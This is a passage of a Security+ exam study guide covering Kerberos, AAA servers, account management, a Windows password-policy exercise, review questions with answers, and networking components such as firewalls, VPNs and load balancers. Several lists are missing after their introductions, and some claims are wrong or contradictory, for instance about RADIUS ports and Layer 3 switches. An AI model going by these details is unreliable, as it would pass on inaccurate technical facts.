Kerberos is the Microsoft authentication protocol that was introduced with the release of Windows Server 2000. It is the only authentication protocol that uses tickets, updated sequence numbers (USN), and is time stamped. The process of obtaining your service ticket is called a ticket granting ticket (TGT) session. It is important that the time on all servers and computers are within five minutes of each other; time can be synchronized by using a time source such as the Atomic Time clock. The Security+ exam looks at Stratum time servers.

Stratum Time Servers: There are three types of Stratum time servers, Stratum 1, 2, and 3. Stratum 1 is internal and Stratum 0 is external and the reference time source. The way to remember this is that you can draw a clock face inside a zero making it the time source. The Stratum 1 time server is linked directly to Stratum 0, the time source. The Stratum 2 time server is linked to the Stratum 1 through a network connection:


Figure 11: Stratum time servers

A TGT session is where a user sends their credentials (username and password, or it could be smart card and PIN) to a domain controller that starts the authentication process and when it has been confirmed it will send back a service ticket that has a 10-hour lifespan. This service ticket is encrypted and cannot be altered:


Figure 12: TGT session

Single sign-on/mutual authentication: Kerberos provides single sign-on as the user needs to login in only once then uses his service ticket to prove who he is; this is exchanged for a Session Ticket with the server that they want to access resources on. In the example here, the user will use his or her service ticket for mutual authentication with an email server:


Figure 13: Mutual authentication

The preceding diagram shows the logged-in user exchanging his encrypted Service Ticket with the mail server which in return provides mutual authentication by returning a session ticket. The logged-in user checks the session ticket's timestamp is within 5 minutes of the domain controllers. This means that Kerberos can complete mutual authentication.

You need to remember that Kerberos is the only authentication protocol that uses tickets. It will also prevent replay attacks as it uses USN numbers and timestamps.

NT Lan Manager (NTLM): NTLM is a legacy authentication protocol that stores the passwords using the MD4 hash that is very easy to crack. It was susceptible to the Pass the Hash attack; it was last used in a production environment in the 1990s.

Internet-based open source authentication

More and more people are accessing web-based applications and need an account to log in, however applications hosting companies do not want to be responsible for the creating and management of the account accessing the application. They use OAuth to help them facilitate this:

Authentication, authorization, and accounting (AAA) servers

The main two AAA servers are Microsoft's Remote Authentication Dial-In User Service (RADIUS) and CISCO's Terminal Access Controller Access-Control System Plus (TACACS+). Both of these servers provide authentication, authorizing, and accounting:

Authentication

A Virtual Private Network (VPN) allows someone working remotely either from a hotel room or home to connect securely through the internet to the corporate network. More information on how the VPN operates will be in Chapter 5Understanding Network Components, at this book; we are going to look at VPN authentication methods in this chapter:


Figure 14: VPN


Figure 15: Challenge-Handshake Authentication Protocol

The client makes a connection request to the remote access server.

    1. The RAS server replies with a challenge that is a random string.

    2. The client uses his password as an encryption key to encrypt the challenge.

    3. The RAS server encrypts the original challenge with the password stored for the user. If the both values match, then the client is logged on.

Learning about Identity and access management controls

In this section, we are going to look at identity and management controls, starting with biometrics and moving on to security tokens and certificates. Let us first look at biometric controls followed by identity management using certificates.

Biometrics

Biometrics is a method of authentication using an individual's characteristics, for example, using a fingerprint as everyone's fingerprints are very different. In 1892, Inspector Eduardo Alvarez from Argentina made the first fingerprint identification in the case against Francisca Rojas who had murdered her two sons and cut her own throat in an attempt to place blame on another, but the inspector proved that she was guilty. We will now look at the types of biometrics:


Figure 16: iPhone fingerprint scanner

Retina and iris scanners both look at an individual's eye and the scanners themselves are physical devices.

Microsoft has released a facial recognition program called Windows Hello that was released with Windows 10; this uses a special USB infrared camera. It being infrared it is much better than other facial recognition programs that can have problems with light.


Figure 17: Crossover error rate

If the CER point is lower down the graph, then there are fewer errors, but if it is at the top of the graph it indicates many errors and could prove more difficult to support; if this was the case, you would change your biometric system.

Security tokens and devices

There are different types of tokens that have different time limits; let us look at the difference between the Time-Based One-Time Password and HMAC-based one-time password:


Figure 18: TOTP

Certification-based authentication

Certificate-based authentication is very popular as it provides two-factor authentication that makes it more secure than single-factor authentication such as a username and password. We will now look at various types:

Port-based authentication

1EEE 802.1x is a port-based authentication protocol that is used when a device is connected to a switch or when a user authenticates to a wireless access point.

Authentication with a password with a short lifespan will be a Time-Based One-Time Password (TOTP).

Common account management practices

Account management ranged from account creation on start up to its disablement when someone leaves the company. Fully understanding these concepts is crucial to obtaining the Security+ certification.

Account types

Each user in a system needs an account to access the network in a Microsoft Active Directory environment; the user account has a Security Identifier (SID) linked to the account. When I create a user called Ian they may have an SID of SID 1-5-1-2345678-345678. When the account is deleted the SID is gone and a new SID is created.

For example, a member of the IT team has deleted a user account called Ian—it may have a SID of SID 1-5-1-2345678-345678, so he quickly creates another account called Ian but this account cannot access resources as it has a new SID of SID 1-5-1-2345678-3499999. The first portion from left to right, identifies the domain and then the remainder is a serial number that is never reused.

There are various different types of user accounts and these are heavily tested in the Security+ exam; you must know when you would need each account:

A guest speaker should be allocated a sponsored guest account.

A service account is a type of administrator account used to run an application.

When you need to monitor or audit to an employee level, you must eliminate the use of shared accounts.

If you do not change the default username and password for household devices it is possible for a cybercriminal to hack into your home. This includes baby monitors, TVs, ovens, and refrigerators.

Account creation

Multinational corporations will make hundreds of accounts annually and need to have a standardized format; this is called a standard naming convention. Account templates are copied and modified with the details of new employees. Some examples of standard naming conventions are:

If you have John Smith and Jack Smith you would have two J Smiths, therefore you may also use a middle initial—J A Smith—or a number at the end—J Smith1—to make them unique.

All user accounts need to be unique so that each person is responsible for their own account. If you leave your computer logged on to the network whilst you go for a coffee and someone deletes data using your account then you are held responsible. A good practice would be to lock your screen while you are not at your desk to prevent this.

Without a standard naming convention, accounts would be created differently and cause chaos when you tried to find users in your directory service.

Employees moving departments

When employees move between departments, IT teams normally modify their account for the next department they move to; they don't generally get a new account. In the Security+ exam, when people move department, they are given new accounts and the old account is active until it has been disabled.

Disabling an account

There are a few times when the IT team will disable accounts as good practice; let us look at the reasons for this:

When an employee leaves a company the first stage is that the account is disabled and not deleted. You will also reset the password so that the old account holder cannot use the account.

Account recertification

Account recertification is a process where an auditor will review all of the user accounts. The auditor will have a matrix showing all of the active accounts and what privileges and access that they should have. If the auditor finds anything wrong then he will report it to the management, who will then either write a new account policy or make changes to the management of accounts using change management. For the purpose of the exam the auditor should be looked at as a snitch—he will never take any action but he will report his findings to the management.

Account maintenance

Account maintenance is ensuring that accounts are created in accordance with the standard naming convention, disabled when the employee initially leaves, then deleted maybe 30 days later.

Account monitoring

If you wish to find out when a user account has been granted a new set of privileges then this can only be done via active monitoring of the accounts. This could be automated by using a security information and event management (SIEM) system that will create and alert you about changes to the system. You will not be alerted by user account review as there could be 6-12 months between the review—you may need to know immediately.

If you want to know immediately when there is a change to a user account such as it being given higher privileges then you need active account monitoring.

Security Information and Event Management

Security information and event management (SIEM) is considered an IT best practice, and for regulated industries it is an audit compliance requirement. It supports IT service reliability by maximizing event log value and is used to aggregate, decipher, and normalize nonstandard log formats; it can also filter out false positives. The only time that an SIEM system will not provide the correct information is when the wrong filters are set in error:


Figure 19: Account expiry

If a person moves department and their old account is still being used, then we should get an auditor who will perform a user account review.


Figure 20: Time and day restrictions

For example, a toy factory may employ university students to work prior to the busy Christmas period with three different shift patterns, 6 a.m.-2 p.m., 2-10 p.m. and 10 p.m.-6 a.m. Each employee will have a time and day restriction in place so that they can log in only for their individual shift times.

If a time restriction is to be placed on a group of contractors, rule based access control will be used. Time and day restriction can only be used for individuals.

Group based access control

When a company has a large number of users it is difficult to give each user access to the resources that they need to perform their job. Groups are created and they will contain all users in that department. For example the sales group will then contain all of the people working in sales and the group will be used to allow access to resources such as a printer or file structure. If you decide to use group-based access and you have new employees or interns you may create another group for them with lower permissions.

For example, in a large corporation there are 25 employees who work in marketing and need full access to the marketing file share. Next week they will have three new interns start with the company but they need only read access to the same share. We therefore create the following:

If group-based access is used in the exam question, then the solution will be a group-based access solution.

Credential management

The details of usernames and passwords that someone uses to access a network or an application are called credentials. Users will sometimes have more than one set of credentials to access their local network, and their Facebook, Hotmail, or Twitter account. It would be a serious security risk to use the same account and password for any two of these. Windows 10 has a Credential Manager that can store credentials in to two categories: generic credentials and Windows 10. When you log in to an account and you check the box Remember Password, these details could be stored inside credential management to consolidate them. It can be for generic accounts used to access web portals or Windows 10 credentials:


Figure 21: Credential manager

User account reviews

An auditor will carry out a user account review periodically to ensure that old accounts are not being used after an employee either moves department or leaves the company. The auditor will also ensure that all employees have the correct amount of permissions and privileges to carry out their jobs and that they don't have a higher level than they required. Least privilege is giving the person only the access that they require.

Practical exercise – password policy

In this practical exercise, you need to prevent users from resetting their account by using the same password. The company should not allow the users to change their password more than once every three days and these passwords need to be complex. A user must use a minimum of 12 passwords before they can reuse the original password. You need to prevent a hacker using more than five attempts at guessing a password:

  1. On a Windows 10 desktop, type gpedit.msc or on a domain controller, go to Server Manager | Tools | Group Policy management. Edit the Default Domain Policy.

  2. Under Computer Configurations, expand Windows Settings.

  3. Select Security Settings.

  4. Select Account Policy, then select Password Policy.

  5. Select Password History and enter 12 passwords remembered—press OK.

  6. Select Minimum Password Age. Enter 3 days—press OK.

  7. Select Password must meet complexity requirements—select the radio button Enabled and press OK.

  8. Go back to Account Policies and select Account Lockout Policies.

  9. Select Account Lockout Threshold and change the value to five invalid logon attempts—press OK.

Review questions

  1. What is the most common form of authentication that is most likely to be enter incorrectly?

  2. When I purchase a new wireless access point what should I do first?

  3. What is password history?

  4. How can I prevent someone from reusing the same password?

  5. Explain what format a complex password takes.

  6. How can I prevent a hacker from inserting a password multiple times?

  7. What type of factor authentication is a smart card?

  8. How many factors is it if I have a password, PIN, and date of birth?

  9. What is biometric authentication?

  10. What authentication method can be used by two third parties who participate in a joint venture?

  1. What is an XML-based authentication protocol?

  2. What is Shibboleth?

  3. What protocol is used to store and search for Active Directory objects?

  4. What is the format of a distinguished name for a user called Fred who works in the IT department for a company with a domain called Company A that is a dotcom?

  5. What authentication factor uses tickets, timestamps, and updated sequence numbers and is used to prevent replay attacks?

  6. Which Stratum time server is the reference time source?

  7. What is a ticket granting ticket (TGT) session?

  8. What is single sign-on? Give two examples.

  9. How can I prevent a Pass the Hash attack?

  10. Give an example of when you would use Open ID Connect.

  11. Name two AAA servers and the ports associated with them.

  12. What is used for accounting in an AAA server?

  13. What is the purpose of a virtual private network (VPN) solution?

  14. Why should we never use PAP authentication?

  15. What type of device is an iris scanner?

  16. What can be two drawbacks of using facial recognition?

  17. What is Type II in biometric authentication and why is it a security risk?

  18. What is a time-limited password?

  19. How many times can you use a HOTP password? Is there a time restriction associated with it?

  20. How does a CAC differ from a smart card and who uses CAC?

  21. What is port-based authentication that authenticates both users and devices?

  22. What type of account is a service account?

  23. How many accounts should a system administrator for a multinational corporation have and why?

  24. What do I need to do when I purchase a baby monitor and why?

  25. What is a privilege account?

  26. What is the drawback for security if the company uses shared accounts?

  27. What is a default account? Is it a security risk?

  28. The system administrator in a multination corporation creates a user account using an employee's first name and last name. Why is he doing this time after time?

  29. What two actions do I need to complete when John Smith leaves the company?

  1. What is account recertification?

  2. What is the purpose of a user account review?

  3. What can I implement to find out immediately when a user is placed in a group that may give them a higher level of privilege?

  4. What will be the two possible outcomes if an auditor finds any working practices that do not confirm to the company policy?

  5. If a contractor brings in five consultants for two months of mail server migration, how should I set up their accounts?

  6. How can I ensure that the contractors in Question 44 can only access the company network 9 a.m.-5 p.m. daily?

  7. If I has a company that has five consultants who work in different shift patterns, how can I set up their accounts so each of them can only access the network during their individual shifts?

  8. A brute-force attack cracks a password using all combinations of characters and will eventually crack a password. What can I do to prevent a brute-force attack?

  9. The IT team have a global group called IT Admin; each member of the IT team are members of this group and therefore has full control access to the departmental data. Two new apprentices are joining the company and they need to have read access to the IT data—how can you achieve this with the minimum amount of administrative effort?

  10. I have different login details and passwords to access Airbnb, Twitter, and Facebook, but I keep getting them mixed up and have locked myself out of these accounts from time to time. What can I implement on my Windows 10 laptop to help me?

  11. I have moved departments but the employees in my old department still use my old account for access; what should the company have done to prevent this from happening? What should their next action be?

Answers and explanations

  1. A password is most likely to be entered incorrectly; the user may forget the password or may have the caps lock set-up incorrectly.

  2. When purchasing any device, you should change the default username and password as many of these are available on the internet and could be used to access your device.

  3. Password history is the number of passwords you can use before you can reuse your current password. Some third-party applications or systems may call this a Password Reuse list.

  4. Password history could be set up and combined with minimum password age. If I set the minimum password age to 1 day, a user could only change their password a maximum of once per day. This would prevent them from rotating their passwords to come back to the old password.

  5. A complex password uses three of the following; uppercase, lowercase, numbers, and special characters not used in programming.

  6. If I set up an account lockout with a low value such as three, the hacker needs to guess your password within three attempts or the password is lockout, and this disables the user account.

  7. A smart card is multi-factor or dual factor as the card is something you have and the PIN is something you know.

  8. A password, PIN, and date of birth are all factors that you know, therefore it is single factor.

  9. Biometric authentication is where you use a part of your body or voice to authenticate, for example your iris, retina, palm, or fingerprint.

  10. Federated services are an authentication method that can be used by two third parties; this uses SAML and extended attributes such as employee or email address.

  11. Security Assertion Mark-up Language (SAML) is an XML-based authentication protocol used with federated services.

  12. Shibboleth is a small open source Federation Services protocol.

  13. Lightweight Directory Authentication Protocol (LDAP) is used to stores objects in a X500 format and search Active Directory objects such as users, printers, groups, or computers.

  14. A distinguisher name in the ITU X500 object format is: CN=Fred, OU=IT, CN=Company, DC=Com.

  1. Microsoft's Kerberos authentication protocol is the only one that uses tickets. It also uses time stamps and updated sequence numbers and is used to prevent replay attacks.

  2. Stratum 0 is the reference time source. Stratum 1 is set up internally to obtain time from the Stratum 0.

  3. A Ticket Granting Ticket (TGT) process is where a user logs into an Active Directory domain using Kerberos authentication.

  4. Single sign-on is where a user inserts their credentials only once and access different resource such as emails and files without needing to re-enter the credentials. Examples of this are Kerberos, Federated Services, and a smart card.

  5. Pass the hash attacks exploit older systems such as Microsoft NT4.0, which uses NT Lan Manager. You can prevent is by disabling NTLM.

  6. Open ID Connect is where you access a device or portal using your Facebook, Twitter, Google, or Hotmail credentials. The portal itself does not manage the account.

  7. The first AAA server is Microsoft RADIUS, using TCP Port 1812—it is seen as non-proprietary. The second is CISCO TACACS+ and uses TCP Port 49. Diameter is a more modern secure form of RADIUS.

  8. Accounting in an AAA server is where they log the details of when someone logs in and logs out; this can be used for billing purposes. Accounting is normally logged in a database such as SQL.

  9. A VPN solution creates a secure to connect from a remote location to your corporate network or vice versa. The most secure tunneling protocol is L2TP/IPSec.

  10. PAP authentication uses a password in clear text; this could be captured easily by a packet sniffer.

  11. An iris scanner is a physical device used for biometric authentication.

  12. Facial recognition could be affected by light or turning your head slightly to one side; some older facial recognition systems accept photographs. Microsoft Windows Hello is much better as it uses infrared and is not fooled by a photograph or affected by light.

  13. Type II in biometric authentication is Failure Acceptance Rate, where people that are not permitted to access a tour network are given access.

  14. Time based one time password has a short time limit of 30-60 seconds.

  1. HOTP is a one-time password that does not expire until it is used.

  2. A CAC is similar to a smart card as it uses certificates, but the CAC card is used by the military, has a picture, and the details of the user on the front and their blood group and Geneva convention category on the reverse side.

  3. IEE802.1x is port-based authentication that authenticates both users and devices.

  4. A service account is a type of administrative account that allows an application to have the higher level of privileges to run on a desktop or server. An example of this is using a service account to run an anti-visas application.

  5. A system administrator should have two accounts: a user account for day-to-day tasks and an administrative account for administrative tasks.

  6. When I purchase a baby monitor I should rename the default administrative account and change the default password to prevent someone using it to hack my home.

  7. A privilege account is an account with administrative rights.

  8. When monitoring and auditing are carried out, the employees responsible cannot be traced while more than one-person shared accounts. Shared accounts should be eliminated for monitoring and auditing purposes

  9. Default accounts and passwords for devices and software can be found on the internet and used to hack your network or home devices. Ovens, TVs, baby monitors, and refrigerators are examples.

  10. The system administrator is using a standard naming convention.

  11. When John Smith leaves the company, you need to disable his account and reset the password. Deleting the account will prevent access to data he used.

  12. Account recertification is an audit of user account and permissions usually carried out by an auditor; this could also be known as user account reviews.

  13. A user account review ensures that old accounts have been deleted—all current users have the appropriate access to resources and not a higher level of privilege.

  14. A SIEM system can carry out active monitoring and notify the administrators of any changes to user account or logs.

  15. Following an audit, either change management or a new policy will be put in place to rectify any area not conforming to company policy.

  16. The contractor's account should have an expiry date equal to the last day of the contract.

  17. Rule-based access should be adopted so that the contractors can access the company network 9 a.m.-5 p.m. daily.

  18. Time and day restrictions should be set up against each individual's user account equal to their shift pattern.

  19. Account Lockout with a low value will prevent brute-force attacks.

  20. Create a group called IT apprentices then add the apprentices accounts to the group. Give the group read access to the IT data.

  21. The credential manager can be used to store generic and Windows 10 accounts. The user therefore does not have to remember them.

  22. The company should have disabled the account. A user account review needs to be carried out to find accounts in a similar situation.

Understanding Network Components

In this chapter we are going to look at networking components and how they could affect the Security of your network, we will look at firewalls, switches and routers. We will start by look at the OSI Reference model that was created to improve communications between devices.

We will cover the following exam objectives in this chapter:

OSI – reference model

The Open Systems Interconnection (OSI) reference model was created by the Internet Standards Organization (ISO) and it is a reference model used for communication. Each of the seven different layers has different protocols and responsibilities. The Security+ exam focuses mainly on layers 2, 3, and 7:


Figure 1: OSI reference model

Here is a brief summary of each layer:

When protocols, such as the TCP IP protocol suite, are created, it is based on some or all layers of this model.

Exam tip: When a switch is mentioned, it is a Layer 2 switch that can create VLANs. ARP operates at Layer 2 and an ARP attack must be done locally on the host.

Installing and configuring network components

There are many network components and topologies (layouts) that we need to know about to maintain a secure environment. We are going to look at each of these in turn. We need to know how each device is configured and which device is the most appropriate in different scenarios. We will look at the firewall, whose main job is to prevent unauthorized access to the network

Firewall

A firewall prevents unauthorized access to the corporate network, and in the Security+ exam, we tend to use a back-to-back configuration, as shown here:


Figure 2: Back-to-back firewall configuration

You can see each of these firewalls is not letting traffic pass through them; this is because we need to open only the ports that we need. If Firewall 1 is traversed, then Firewall 2 will hopefully prevent access to the internal network known as the local area network. To enable applications to pass through the firewall, we must open the port number for each application. Each application has a different port number, if you think of someone who wants to watch the news, the Democrats watch CNN on Channel 21 and the Republicans will watch Fox News on Channel 29. Each TV programme has a different channel number. If we want to enable internet access, we should make an exception to the Hypertext Transfer Protocol (HTTP) on TCP port 80. This is the port number that each web server works on no matter whether we use Internet Explorer, Microsoft Edge, Google Chrome, or Firefox; each of these applications uses TCP port 80 to allow web traffic.

The direction of ports is outbound coming from the internal network going to the external network, or inbound coming from outside to the internal network. If we opened only the outbound port for port 80, the request would go out but the incoming response would be prevented.


The main purpose of a firewall is to prevent unauthorized access to the network. The default setting is to block all traffic allowed by exception. There are many different firewalls:


Figure 3: Host-based firewall

As the host-based firewall is an application on a desktop, it is vulnerable to attack. If someone disables the service running the Windows firewall service, then the firewall is disabled and the computer becomes vulnerable. Remember from Chapter 4, Delving into Identity and Access Management, services are started using a service account, a type of administrative account. The following image shows a running firewall service:


Figure 4: Windows firewall service

Exam tip: A UTM firewall is an all-in-one security appliance that acts as a firewall and does content and URL filtering. It can also inspect malware.

Router

A router is a device that connects two different networks together, when setting up a host machine, it is known as the default gateway. It is used by your company to give you access to other networks, for example the internet. It has a routing table built into it, so it knows which route can be used to deliver network packets. The router is the IP equivalent of a post office sending letters around the world, but instead of letters, IP packets are being transported.

Access Control List (ACL): The router sits on the external interface and uses an ACL so it can also filter the traffic coming into the network by:


Anti-spoofing: An anti-spoofing filter is placed on the input side of a router interface and only allows packets through that are within the address range of that subnet. It excludes packets that have invalid source addresses.

Access control list– network devices

The Access Control List (ACL) for network devices must not be confused with the ACL for files and folders, they are totally different. Two network devices that use ACL are firewalls and routers. The ACL prevents access by using port numbers, application names, or its Internet Protocol (IP) address. When you install a new firewall or router, there are no rules except the last rules of deny all. The default for either a router or firewall is to block all access allowed by creating exceptions using allow rules for the traffic you want to allow through. If there are no allow rules, the last rule of deny applies, this is called an Implicit Deny.

Example:

John has been doing some online shopping and bought a pair of shoes, but he cannot download the new book that he bought. He has used HTTP to gain access to a website, and then gone to the secure server for payment, using HTTPS for purchases, to protect his credit card details; however, when trying to download the book, the traffic is being blocked by the firewall. The ACL allows TCP port 80 (HTTP) and HTTPS, but there is no allow rule for FTP that used TCP port 21:


Figure 5: Implicit deny

As there is no allow rule on the firewall for FTP traffic, when the FTP traffic arrives, it is checked against the allow rules, and if there is no matching rule, it then drops down to the last rule, denying all traffic – this is known as Implicit Deny. Although the example is for a firewall, an ACL is used by the router. Both devices are filtering incoming traffic.

Intrusion-prevention system

There are two types of Intrusion-Prevention Systems (IPS), the first is the Network Intrusion Prevention System (NIPS), which can only operate on your network and cannot work inside a host. The second is called the Host Intrusion Prevention System (HIPS), and it operates inside a host machine and cannot operate on the network.

NIPS is an internal network device whose role is to prevent access to the network, and it is placed on the perimeter of your network behind your firewall. Think of NIPS as Rambo with a big gun whose job it is to shoot the bad guys.

Intrusion-detection system

The Intrusion-Detection System (IDS) is the same as the IPS, there is the HIDS which only works on a host, and the NIDS which only works on the network. Think of the IDS as Sherlock Holmes, the famous detective, his job is to find different traffic patterns on the network and then inform Rambo, the NIPS, who will then remove them from the network.

Exam tip: NIPS has the capability to detect as well as protect if there are no NIDS on your network. To protect a virtual machine from attack, you will install a HIPS.

Modes of detection

There are three modes of detection used by the NIPS/NIDS. For the purpose of the exam, you must know them thoroughly:

Exam tip: Anomaly-based NIPS/NIDS detect new patterns and are much more efficient than signature-based, which can only work with known variants.

Modes of operation

There are different modes of operation for the sensors of the NIPS/NIDS:

When sensors are placed inside the network, they can only detect traffic once it is inside your network and has passed through your firewall. If you wish to detect attacks before they come into your network, the sensor must be placed on the external network to the firewall.

Monitoring data

When analytics (how we analyze the data) analyze the information provided, it is based on rules that are set inside the IPS/IDS. However, no system is foolproof. They try their best but sometimes provide outcomes different than those expected. There are two different types:

Exam tip:
A false positive is a false alarm, however a false negative doesn't detect anything while you are being attacked.

Switch

A switch is an internal device that connects all users in a local-area network. The switch has a table listing the MAC addresses of the host connected to it:


Figure 6: Cisco switch

Once the switch has been installed, it builds up a routing table; each host is identified by their MAC address. The switch delivers the packet only to the host that requires the packet. Switches can be stacked when there are more than 48 users connected to the network:


Figure 7: Network connections

A computer has an ethernet cable that plugs into a wall jack, then the wall jack is connected to the patch panel by cables that are laid under floors or above ceilings, a user cannot see them. From the patch panel, there is a cable that goes into one port on the switch. It is very easy to plug a cable into a wall jack the network administrator must place security on the switch. There are two types port security and 802.1x and other protection that can be configured:

Exam tip:
If you want to prevent someone plugging their laptop into a waiting area, we will use Port Security to shut that port down. But if you want to prevent a rogue Server or a Wireless Access Point from connecting to the network, we will use 802.1x port security, which authenticates the device.

Layer 3 switch

Traditional switches work at layer 2 of the OSI Reference Model and are susceptible to ARP attacks. However, a layer 3 switch operates at the network layer using the IP address, and they route packets the same as a router and are high-performance switches. They operate using IP and not MAC addresses and this means that they are not affected by ARP attacks as they operate at Layer 2.

Proxy server

A proxy server is a server that acts as an intermediary for requests from clients seeking resources on the internet or an external network. Think of it as a go-between who makes requests on behalf of the client, ensuring that anyone outside of your network does not know the details of the requesting host.

The flow of data is from internal to external and it has three main functions: URL filter, content filter, and web page caching:


Figure 8: Proxy server

Reverse proxy

The flow of traffic from a reverse proxy is incoming traffic from the internet coming into your company network. The reverse proxy is placed in a boundary network called the Demilitarized Zone (DMZ). It performs the authentication and decryption of a secure session so it can filter the incoming traffic.

Example: If a company sets up a webinar through Skype or another video conference application, they can invite potential customers. All of the conferencing requests will pass through a reverse proxy that authenticates them and redirects their session to the relevant Skype server.

Remote access

There are times when people who are working remotely need to access the company's network to access resources. There are two main types of remote access:

Exam tip:
L2TP/IPsec is the only tunneling protocol in the exam objectives, you need to know it thoroughly, especially how IPSec works, both the Authenticated Header (AH) and Encapsulated Payload (ESP). The only other VPN that is mentioned is the legacy SSL VPN that uses a SSL certificate.

Virtual private network using L2TP/IPSec

Before we look at the tunneling protocols, we need to learn a little about encryption – there are two main types of encryption: asymmetric and symmetric. Encryption is the process of taking data in plaintext format and transferring it to ciphertext, a format that makes it unreadable. Encryption is covered in depth later in this book; the two main types are:

Exam tip:
Symmetric encryption is used to encrypt and decrypt large amounts of data as it uses only one key, making it faster than asymmetric, which uses two keys.

A VPN creates a tunnel across the internet, normally from home or a remote site to your work. We need to look at the L2TP/IPSec tunnel that works at Layer 2 of the OSI Reference Model where IPSec is used to encrypt the data, an IPSec packet is formed of two different portions:

IPSec

IPSec can be used to create a secure session between a client computer and a server. For example, you may have the financial data on a financial server. All members of the finance team will have IPSec tunnels created between their desktops and the financial server. This will prevent anyone using a packet sniffer stealing data from the financial server or any session across the network.

IPSec can also be used as a VPN protocol as part of the L2TP/IPSec tunneling protocol that is used by major vendors who create VPN solutions, such as CISCO, Microsoft, Sonic Wall, or Checkpoint.

IPSec – handshake

The first stage of an IPSec session is to create a secure tunnel—this is known as security association. In the Security+ exam this is called Internet Key Exchange (IKE). Diffie Hellman is used to set up a secure tunnel before the data is:


Figure 9: Diffie Helman

The IKE phase of the IPSec session is using Diffie Hellman over UDP port 500 to create what is known as quick mode. This creates a secure session so that the data can flow through it.

The second phase is where the data is encrypted with DES, 3 DES, or AES. AES provides the most secure VPN session as it uses 128, 192, or 256 bits. There are two different IPSec modes:

VPN concentrator

The purpose of the VPN concentrator is to set up the secure tunnel during the IKE phase. It needs to create a full IPSec tunnel. This normally when you have a site-to-site VPN.

Site-to-site VPN

A site-to-site VPN is where you have two different sites, each with a VPN concentrator at each site and it acts like a lease line. The session is set to always on as opposed to dial on demand:


Figure 10: Site-to-site VPN

VPN always on versus on-demand

There are two main session types: the first is on-demand, where a remote worker initiates a VPN session from home or a remote location, and when they finish the session the connection is dropped. The second is where a site-to-site VPN is set up and the session is known as always on, where the session is permanent.

SSL VPN

SSL VPN is a VPN that can be used with a web browser that uses an SSL certificate for the encryption. It has been replaced in recent times with Transport Layer Security (TLS), which is a more modern version of SSL. In the Security+ exam, the SSL VPN is normally used for legacy VPNs that don't support L2TP/IPSec.

Exam tip:
SSL VPN is the only VPN to use an SSL certificate, and it only needs a web browser to make a connection. It could also be replaced by the more secure TLS certificate.

Split tunnelling

Split tunneling is where a secure VPN session is connected and the user opens an unsecure session that would allow the hacker to come in through the unsecured session and gain access to your company's network:


Figure 11: Split tunnel

Example: John connects his L2TP/IPSec session into the company network, then he realizes that he needs a train ticket for tomorrow. Instead of dropping the secure session and then going to the rail website, he leaves it connected. Once he opens up his web browser, he is using HTTP on TCP port 80, which is unsecured. This means that while he has the web browser open, a hacker could access his desktop and use the secure tunnel to gain access to the company network.

Exam tip: A VPN should always set up a full tunnel, no other form of tunneling, such as split tunneling, should be used.

Load balancer

A network load balancer is a device that is used when there is a high volume of traffic coming into the company's network or web server. It can be used to control access to web servers, video conferencing, or email. In the Security+ exam, it is normally a high volume of web traffic. From Figure 12, you can see that the web traffic comes into the load balancer from the Virtual IP address (VIP) on the frontend and is sent to one of the web servers in the server farm:


Figure 12: Load balancer

The load balancer has selected to send the request to Web 3, which has the least number of requests (50), and Web 4 will not be considered as it is currently offline. A user requesting three different pages may obtain them from different web servers but may not know this as the load balancer is optimizing the delivery of the web pages to the user.


Figure 13: DNS Round Robin

While using DNS round robin when the request comes in, the load balancer contacts the DNS server and rotates the request based on the lowest IP address first, rotates around Web 1, 2, and 3, and then keeps the sequence going by going back to Web 1 on a rotational basis.

Clustering

Clustering is where two servers share a quorum disk on the backend. The normal setup is the active-passive configuration, as shown in Figure 14, and it is commonly used for email or database servers:


Figure 14: Clustering.

In the preceding diagram, the request comes to the Virtual IP that sends the request to the active node that fulfils the request. In the background, the passive node is also connected to the shared disk, but has a heartbeat polling the active node. If the active node fails, the passive takes over.

The other mode of clustering is where both nodes are active in an active-active configuration. With this configuration, both nodes need to have enough resources to act as a dual active node without suffering from a bottleneck.

Data-loss prevention

Data Loss Prevention (DLP) can stop unencrypted sensitive and personally identifiable information (PII) from inadvertently leaving the company. It cannot scan encrypted data. There are two separate ways it can prevent data loss:

Example:

An auditor has found that the credit card details of customers have been sent out of the company by email, and this needs to be prevented in the future. The company only accepts VISA, Mastercard, and American Express.

The solution would be to set up a DLP template with the regular expression format for VISA, Mastercard, and American Express. As emails leave the company, they are scanned for this format and if it is included in an email, it is blocked and the security administrator is informed.

Exam tip:
DLP prevents PII and sensitive data from being inserted into an email or copied onto a USB flash drive.

Security information and event management

A security information and event-management (SIEM) system automates the collection of log files from multiple hosts, servers, and network devices, such as firewalls, in real time to identify potential risks to the network. The types of functionality from a SIEM system are:

Mail gateway

A Mail Gateway is a device that sits in a DMZ to scan incoming and outgoing email for viruses. It can also act as a spam filter, preventing spam emails from reaching the internal mail server.

Cloud-based email

Due to email being a critical function for businesses, more and more companies are moving away from in-house, server-based solutions, and are using Microsoft Office 365 or Google G Suite. The benefits of cloud-based email are that the cloud provider is responsible for scanning the incoming email as well as providing the hardware to run the mail servers.

Media gateway

A Media Gateway is a translation device or service that converts media streams between disparate telecommunications technologies. An example of this is Karaka, which is an XMPP Gateway that allows communication between Jabber and Skype.

Hardware security module

A Hardware Security Module (HSM) is a physical device that stores the X509 certificates used on a network. These modules traditionally come in the form of a plug-in card or an external device that attaches directly to a computer or network server.

Software-defined network

Traditional networks route packets via a hardware router and are decentralized; however, in today's networks more and more people are using virtualization, including cloud providers. A software-defined network (SDN) is where packets are routed through a controller rather than traditional routers, which improves performance.

Secure network architecture concepts

Securing networks and protecting them is vital to protect a company's assets. We use different zones and topologies, network separation and segmentation, and install firewalls to prevent unauthorized access to the network. First of all, let's look at different zones and topologies. There are three main zones—LAN, WAN and DMZ:

Example:

An upscale store sells designer sneakers at $230, however, the shop's owner purchases them from the manufacturer by placing orders on the extranet server. Access to the extranet web server is via a unique username and password, and the price the shop purchases the sneakers at is $125, allowing for a profit of $105. On the intranet, web server is the manufacturing price of the sneakers, which are made in China, for a mere $5 a pair:


Figure 15: Zones

From this information, you should ask yourself three simple questions:

You can see why data in a LAN needs to be secure and not freely available to the general public.

Network address translation

Network Address Translation is where a request from a private internal IP address is translated to an external public IP address, hiding the internal network from external attack. See Figure 16:


Figure 16: NAT

A NAT could be set up to hide a R&D network where new products are designed. Remember, a competitor may try to steal your new ideas and get them to market before you. A NAT could be set up on a firewall or a NAT server.

Port address translation

Port address translation (PAT) is where multiple internal requests are translated to an external IP address, see Figure 17:


Figure 17: PAT

A proxy server could be used for PAT as it gets many internal requests that are translated to one external IP address.

Network access control (NAC)

